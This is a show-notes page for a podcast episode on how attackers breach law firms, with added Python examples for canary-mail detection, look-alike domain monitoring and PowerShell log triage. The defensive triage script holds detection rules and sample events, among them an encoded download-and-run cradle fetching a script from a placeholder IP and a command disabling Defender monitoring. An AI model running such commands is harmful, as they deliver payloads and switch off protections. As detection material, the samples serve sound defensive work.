Subscribe to the CyberThreatPOV Podcast

Episode 40: How Attackers Target Law Firms and How To Detect & Prevent It

It’s no secret law firms have become prime targets for attackers due to the sensitive information they handle and the clients they do business with. In this episode Brad and Spencer discuss common tactics used by attackers to breach law firms’ defenses and provide practical tips on how to detect and prevent these types of attacks.

LegalSec Conference

  • 00:22 LegalSec is a cybersecurity conference targeted specifically at law firms.
  • 00:39 ILTA (International Legal Technology Association) puts on the event.
  • 00:59 The conference covers topics such as vulnerability management, asset inventory, and threat actors.

Importance of Cybersecurity for Law Firms

  • 01:19 Law firms are being targeted by attackers due to the sensitive information they hold.
  • 01:41 All law firms have similarities in how they are attacked, regardless of their security maturity level.
  • 02:01 It is important to detect and prevent attacks to keep law firms secure.

Offensive Security Group’s Experience with Law Firms

  • 02:19 Around 50% of the client base across the Offensive Security Group’s pen testing, security operations center, and ISO groups is law firms.
  • 03:41 The group has been involved with legal conferences such as ILTA and LegalSec due to its involvement in that market vertical.
  • 03:57 The Offensive Security Group makes an extra effort to attend legal conferences because they are among peers and friends in that market vertical.

04:54 Introduction

In this section, the speaker introduces themselves and their company, SecureIT360. They discuss their passion for legal cybersecurity and how law firms are targeted.

Key Points

  • The speaker discusses the craftsmanship, effort, and customer service of SecureIT360.
  • Law firms are not uniquely targeted by threat actors.
  • The speaker mentions that they will be discussing two things that set law firms apart from other verticals: access to a large breadth of information and the impact on reputation.

05:31 Law Firms’ Access to Information

In this section, the speaker discusses how law firms have access to a large amount of sensitive information due to the nature of their work.

Key Points

  • Law firms have access to a large breadth of information due to the type of cases they handle.
  • Even smaller law firms in cities may have prominent people in the area as clients.
  • Law firms handling mergers and acquisitions may be privy to sensitive information during discovery.

08:05 Unique Impact on Reputation

In this section, the speaker discusses how a serious security incident at a law firm could be significantly detrimental to their future due to reputational damage.

Key Points

  • Ransomware extortion is uniquely impactful for law firms due to reputational damage.
  • A serious security incident could potentially harm a firm’s reputation and future success in litigation.
  • The reputational impact is different from other industries such as hospitals or Amazon because, in the legal space, clients choose who they do business with.

10:03 Law Firm Websites and Information Exposure

The section discusses how law firms use their attorneys’ information as marketing and sales material to attract new clients. However, this information is also available to attackers, who can use it for social engineering or phishing attacks.

Law Firms Use Attorneys’ Information for Marketing

  • 10:03 Law firms showcase their attorneys’ credentials on their websites to attract new clients.
  • 10:03 This includes industry awards, speaking engagements, and educational background.

Attackers Can Exploit Publicly Available Information

  • 10:20 Attackers can access publicly available information on law firm websites such as email addresses, phone numbers, education history, and awards received.
  • 11:03 This information can be used for social engineering or phishing attacks by creating a believable pretext that targets the ego or personality of the victim.

External Penetration Testing Targets Law Firm Websites

  • 12:00 During external penetration testing of law firms, testers often start by downloading all publicly available information from the firm’s website using scripts they have written.
  • 12:20 Testers can then build a user list from this information to log into various systems.

12:56 Using Public Databases for Social Engineering

The section discusses how public databases can be used in social engineering attacks against law firms.

Common Usernames Make Attacks Easier

  • 12:56 In many environments usernames are the same as email addresses, which makes them easy to guess from publicly available information.
  • 13:14 Third-party services that log in with a username rather than an email address, such as SSL VPN accounts, can be targeted with the same stolen credentials.

Public Databases Provide Valuable Information

  • 13:33 Attackers can use public databases to find information such as graduation dates, addresses, and workplaces of individuals.
  • 13:48 This information can be used to create convincing password lists for brute force attacks against accounts.
  • 14:06 Law firms need to be aware of the risks associated with publicly available information on their websites and take steps to protect themselves from social engineering attacks.

14:45 Understanding Types of Attacks and Law Firm Targeting

In this section, the speaker recommends setting up Canary accounts or emails to detect spam campaigns, social engineering, phishing attacks, and other malicious activities. The speaker also suggests using deception techniques to trap attackers.

Canary Accounts and Emails

  • 15:03 Setting up Canary accounts or emails can be an effective way to detect spam campaigns, social engineering, phishing attacks, and other malicious activities.
  • 15:22 Creating fake personas on LinkedIn, or fake email addresses that are not otherwise in use, means any mail sent to them is unsolicited and can be blocked immediately by the email filter at your edge.
  • 15:41 Deception techniques such as cloning websites or creating fake PDFs online with false metadata can also be used to trap attackers.

Deception Techniques

  • 15:59 Using deception techniques on the Blue Team side involves thinking like an attacker and trapping them intentionally.
  • 16:15 Embedding fake account numbers in GitHub repos is one example of a deception technique that can be used to track threat actors’ behavior and location.
  • 16:32 Deception techniques such as setting up traps for attackers can cause hesitation and slow down their progress. This creates more opportunities for them to make mistakes and get detected.
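The canary mailbox idea from the two lists above, turned into detection logic as an added example (not the podcast’s or SecureIT360’s tooling). The gateway log format, the canary addresses and the sample lines are all constructed; any mail to a canary is unsolicited by definition, so its source becomes an edge block candidate, and the same source’s mail to real mailboxes is the rest of the campaign.

```python
import re
from collections import defaultdict

# Added example, not SecureIT360's tooling. Addresses and log lines are constructed.
# Canary addresses: published (fake persona, stale web page) but never used for real mail.
CANARY_ADDRESSES = {"j.doe@example-law.test", "recruiting.old@example-law.test"}

# Constructed edge mail-gateway log; any mail to a canary is unsolicited by definition.
SAMPLE_LOG = """\
2024-05-01T09:12:01Z accept from=<partner@client-co.test> to=<a.smith@example-law.test> ip=198.51.100.7
2024-05-01T09:15:44Z accept from=<hr@talent-hub.test> to=<j.doe@example-law.test> ip=203.0.113.25
2024-05-01T09:16:02Z accept from=<hr@talent-hub.test> to=<b.jones@example-law.test> ip=203.0.113.25
2024-05-01T10:01:13Z accept from=<invoice@billing-notice.test> to=<recruiting.old@example-law.test> ip=192.0.2.99
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) \S+ from=<(?P<sender>[^>]*)> to=<(?P<rcpt>[^>]*)> ip=(?P<ip>\S+)$")

def parse_line(line):
    """Fields of one gateway log line, or None if the line is malformed."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def canary_hits(log_text, canaries=CANARY_ADDRESSES):
    """Parsed records whose recipient is a canary address."""
    recs = (parse_line(l) for l in log_text.splitlines())
    return [r for r in recs if r and r["rcpt"].lower() in canaries]

def block_list(log_text, canaries=CANARY_ADDRESSES):
    """(source IP, sender domain) -> canaries it hit; these are the edge block candidates."""
    by_source = defaultdict(set)
    for rec in canary_hits(log_text, canaries):
        domain = rec["sender"].rsplit("@", 1)[-1].lower()
        by_source[(rec["ip"], domain)].add(rec["rcpt"].lower())
    return {k: sorted(v) for k, v in by_source.items()}

def campaign_recipients(log_text, canaries=CANARY_ADDRESSES):
    """Real mailboxes the same sources also hit: the rest of the campaign to quarantine."""
    sources = {ip for ip, _dom in block_list(log_text, canaries)}
    rcpts = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["ip"] in sources and rec["rcpt"].lower() not in canaries:
            rcpts.add(rec["rcpt"].lower())
    return sorted(rcpts)

if __name__ == "__main__":
    for src, hit in block_list(SAMPLE_LOG).items():
        print("block", src, "hit canaries", hit)
    print("also received from those sources:", campaign_recipients(SAMPLE_LOG))
```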

17:31 Canaries as a Reliable Defense Tactic

In this section, the speakers discuss how deception tactics such as using Canaries are reliable defense tactics against cyber threats. They explain how Canaries work by putting adversaries on the back foot.

Canaries as Reliable Defense Tactics

  • 17:52 Using Canaries is a reliable defense tactic because it is uniquely successful and produces no false positives.
  • 18:07 Canaries create traps that cause hesitation and slow down attackers, creating more opportunities for them to make mistakes and get detected.
  • 18:30 The goal of defense in depth is not to be 100% secure but to create enough trouble for attackers that they cannot move around undetected.

19:26 Monitoring Internal and External Attack Surfaces

In this section, the speakers discuss the importance of monitoring internal and external attack surfaces. They emphasize user awareness, reviewing your attack surface, regularly reviewing your external footprint, and reviewing information on your website.

Importance of User Awareness

  • Educating users on what suspicious activity looks like is important.
  • Users should be aware of what to look out for.

Reviewing Your Attack Surface

  • Regularly review your attack surface.
  • It doesn’t have to be a complicated attack surface management platform or product.
  • You could do it yourself.

Regularly Review Your External Footprint

  • Regularly review what services you have open on the internet.
  • Review what websites you have available.
  • Review domains that are in use.

Review Information on Your Website

  • All information on your website should be reviewed regularly.
  • Check if you’re accidentally exposing anything that you didn’t know about.

20:39 Detecting Impersonation Attacks

In this section, the speakers discuss how to detect impersonation attacks. They suggest looking at various permutations of your domain and seeing if they’re registered or if certificates were created for them.

Identifying Look-Alike Domains

  • If somebody creates a look-alike domain, is that something that you’re going to be able to identify?
  • There are email security products that can help with some of that.

Detecting Impersonation Attacks

  • Looking at various permutations of your domain can help detect impersonation attacks.
  • See if they’re registered or if certificates were created for them.
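The look-alike domain check described above, as an added example (not the podcast’s or any vendor’s tool): generate the permutations of your own domain that an impersonator might register, then periodically check which of them resolve. example-law.com and the homoglyph, TLD and keyword tables are constructed; the network check is a plain DNS lookup and is kept separate so the generator runs offline.

```python
import socket

# Added example, not the podcast's or any vendor's tool. example-law.com is a
# constructed domain; tune HOMOGLYPHS / TLDS / KEYWORDS to your own brand.
HOMOGLYPHS = {"l": ("1", "i"), "i": ("l", "1"), "o": ("0",), "e": ("3",),
              "a": ("4",), "s": ("5",), "m": ("rn",), "w": ("vv",)}
TLDS = ("com", "net", "org", "co", "law", "legal")
KEYWORDS = ("login", "portal", "secure", "docs")

def permutations(domain):
    """Look-alike candidates for a second-level domain, as a watch list for a defender."""
    label, _, tld = domain.lower().partition(".")
    names = set()
    for i, ch in enumerate(label):
        names.add(label[:i] + label[i + 1:])                          # omission
        names.add(label[:i] + ch + label[i:])                          # repetition
        if i < len(label) - 1:
            names.add(label[:i] + label[i + 1] + ch + label[i + 2:])  # transposition
            names.add(label[:i + 1] + "-" + label[i + 1:])              # hyphen insertion
        for glyph in HOMOGLYPHS.get(ch, ()):
            names.add(label[:i] + glyph + label[i + 1:])               # homoglyph swap
    if "rn" in label:
        names.add(label.replace("rn", "m"))                            # rn -> m
    names.add(label.replace("-", ""))                                  # hyphen removal
    names.update(f"{label}-{kw}" for kw in KEYWORDS)                   # brand + keyword
    names.discard(label)
    clean = [n for n in names if n and not n.startswith("-") and not n.endswith("-") and "--" not in n]
    candidates = {f"{n}.{tld}" for n in clean}
    candidates.update(f"{label}.{t}" for t in TLDS if t != tld)        # TLD swap
    return sorted(candidates)

def resolves(domain, timeout=2.0):
    """True if the candidate currently resolves (network call; not used in the offline test)."""
    socket.setdefaulttimeout(timeout)
    try:
        socket.gethostbyname(domain)
        return True
    except OSError:
        return False

def registered_lookalikes(domain):
    """Subset of permutations(domain) that resolve today. Rerun on a schedule and diff the
    result; Certificate Transparency logs are a second source to check the same list against."""
    return [c for c in permutations(domain) if resolves(c)]
```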

21:20 Asset Management Program as Foundation for Security Program

In this section, the speakers discuss the importance of asset management programs as the foundation for security programs. They emphasize that knowing what you have and its status is crucial to your security program’s success.

Importance of Asset Management Program

  • Your asset management program says more about the future success of your security program than anything else.
  • Knowing what you have and its status is crucial to your security program’s success.

Problems Solved by Asset Management Program

  • The number of problems that can be solved before they ever happen just by keeping an eye on what you have outside and inside is significant.
  • You can’t patch it or vulnerability scan it if you don’t know you have it.

22:50 Ransomware Extortion

In this section, the speakers discuss ransomware extortion and how it begins on the endpoint. They suggest using MFA, strong passwords, and checking endpoints regularly.

Access Methods for Ransomware Extortion

  • Ransomware extortion often begins on the endpoint.
  • Access methods include RDP exposed to the internet with weak credentials, or SSL VPNs with weak credentials.

Endpoint Security

  • People are buying EDR and XDR but not focusing on endpoint security.
  • Checking boxes and moving on is not enough.

Mature Firm Endpoint Security

  • A mature firm should focus on application control, MFA, strong passwords, etc.

24:05 Endpoint Security Best Practices

In this section, the speakers discuss endpoint security best practices to mitigate ransomware attacks. They emphasize the importance of application control, regular endpoint reviews, and PowerShell restrictions.

Mitigating Ransomware Attacks

  • 24:05 Threat actors want high-level access to ransom the environment or affect as many machines as possible.
  • 24:21 Application control and blocking mounting of ISO files can help mitigate initial access.
  • 24:40 Regularly reviewing endpoints and patching third-party software is important.
  • 25:03 PowerShell is heavily used by threat actors for execution and for downloading malicious payloads.
  • 25:49 Good PowerShell restrictions and monitoring for suspicious activity can go a long way in mitigating attacks.

Implementing Endpoint Security

  • 26:06 Application control, application whitelisting, and Windows Defender Application Guard are essential for endpoint security.
  • 26:26 Implementing these alongside PowerShell monitoring can provide a strong defense against attacks.
  • 26:44 Custom rules associated with malicious PowerShell scripts can be set up to monitor everything.
  • 27:01 Setting these goals can make firms part of the one or two percent who are really secure.
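The PowerShell monitoring and custom rules mentioned in the two lists above, as an added example (not the podcast’s or SecureIT360’s rules): a small scoring triage over script block log entries and process command lines, including decoding of -EncodedCommand payloads so the rules see what actually runs. The sample events, the rule weights and the alert threshold are constructed; the field names follow the Windows PowerShell Operational log (event 4104) and a process-creation event carrying the command line.

```python
import base64
import re

# Added example, not the podcast's or SecureIT360's rules. Sample events below are
# constructed; field names follow the PowerShell Operational log (event 4104) and a
# process-creation event carrying the command line (e.g. 4688 / Sysmon event 1).
RULES = [
    ("download-cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer", re.I), 3),
    ("invoke-expression", re.compile(r"Invoke-Expression|\bIEX\b", re.I), 2),
    ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    ("policy-bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I), 1),
    ("encoded-command", re.compile(r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("defender-tamper", re.compile(r"Set-MpPreference|Add-MpPreference", re.I), 3),
]
ALERT_THRESHOLD = 3

PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Logs -Filter *.log | Measure-Object"},
    {"EventID": 4688, "CommandLine": "powershell.exe -NoP -w hidden -ep bypass -enc " + ENCODED},
    {"EventID": 4104, "ScriptBlockText": "Set-MpPreference -DisableRealtimeMonitoring $true"},
]

def decode_encoded_command(cmdline):
    """UTF-16LE payload behind an -EncodedCommand / -enc / -e argument, or None."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score(text):
    """Names of the rules that match one piece of PowerShell text, and their total weight."""
    hits = [name for name, rx, _w in RULES if rx.search(text)]
    return hits, sum(w for name, _rx, w in RULES if name in hits)

def triage(event):
    """Score a script block (4104) or a process command line; a decoded payload is scored too."""
    text = event.get("ScriptBlockText") or event.get("CommandLine", "")
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + "\n" + decoded
    hits, total = score(text)
    return {"alert": total >= ALERT_THRESHOLD, "score": total, "rules": hits, "decoded": decoded}
```

Feed it the JSON or XML export of the 4104 events rather than the sample list, and raise the threshold once the benign baseline of your own admin scripts is known.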

Challenges in Endpoint Security

  • 27:21 Lack of support for security governance and responsibility is a challenge in implementing endpoint security measures.
  • 28:08 IT and security often have to do what they can by themselves due to lack of support from other departments.

Overall, implementing good endpoint security practices such as application control, regular reviews, patching third-party software, restricting PowerShell usage, and implementing custom rules associated with malicious scripts can go a long way in mitigating ransomware attacks. However, challenges such as lack of support for security governance and responsibility can make it difficult to implement these measures effectively.

28:45 Checking Assumptions

In this section, the speaker talks about the importance of checking assumptions and implementing things correctly to ensure a strong security posture.

Importance of Checking Assumptions

  • 29:03 It is important to check assumptions to ensure that things are implemented correctly.
  • 29:22 Implementing security measures can be difficult, especially for larger teams with extensive change control.
  • 29:40 Firms that implement these measures notice a significant increase in their defense and security posture.

30:00 Establishing a Security Culture

In this section, the speaker emphasizes the importance of establishing a security culture within an organization.

Internal Pen Testing

  • 30:00 Pen testing is an effective way to test internal controls and identify weaknesses.
  • 30:17 Leadership investment in effort, time, and money is necessary for establishing a strong security culture.

Strategies for Establishing a Security Culture

  • 30:35 There are many strategies that can be employed to establish a security culture that aren’t expensive and don’t require extensive leadership involvement.
  • 30:54 Sharing this podcast with friends and colleagues is one way to help spread awareness about cybersecurity best practices.
